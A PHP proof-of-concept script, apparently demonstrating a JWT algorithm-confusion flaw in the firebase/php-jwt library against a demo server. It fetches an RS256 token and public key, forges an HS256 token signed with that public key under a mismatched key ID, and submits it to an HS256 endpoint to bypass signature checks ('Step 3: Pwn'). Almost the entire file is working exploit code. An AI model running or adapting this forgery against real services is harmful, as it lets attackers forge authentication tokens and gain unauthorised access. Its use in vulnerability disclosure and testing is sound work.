<?php
declare(strict_types=1);

use Firebase\JWT\JWT;
use GuzzleHttp\Client;

require_once __DIR__ . '/vendor/autoload.php';

if ($argc < 1) {
    echo "Usage:\nphp {$argv[0]} http://example.com\n";
    exit(1);
}

/**
 * Convenience method
 *
 * @param string $url
 * @param array $params
 * @return array
 * @throws \GuzzleHttp\Exception\GuzzleException
 */
function fetch_json(string $url, array $params = []): array
{
    $client = new Client();
    if ($params) {
        $response = $client->get($url, ['query' => $params]);
    } else {
        $response = $client->get($url);
    }
    $body = $response->getBody()->getContents();
    if (empty($body)) {
        throw new Exception('Invalid response body');
    }

    $decode = json_decode($body, true);
    if (!is_array($decode)) {
        throw new Exception('Invalid response JSON');
    }
    return $decode;
}
$baseurl = rtrim(trim($argv[1]), '/');

// Step 1: Fetch a token and public key
$step1 = fetch_json($baseurl . '/rs256.php', []);
if (empty($step1['token']) || empty($step1['public-key'])) {
    throw new Exception('Invalid response. Is the demo server online?');
}
$token = $step1['token'];
$pk = $step1['public-key'];

// You can replay this token against itself:
// $test = fetch_json($baseurl . '/rs256.php', ['token' => $token]);

// Step 2: Forge a token using the public key, but wrong key ID
$step2 = JWT::encode(
    [
        'pwned' => 'very yes',
        'firebase' => 'pH too high'
    ],
    $pk,
    'HS256',
    'legolas1' // wrong key id!!!
);

// Step 3: Pwn;
$step3 = fetch_json($baseurl . '/hs256.php', ['token' => $step2]);
var_dump($step3);
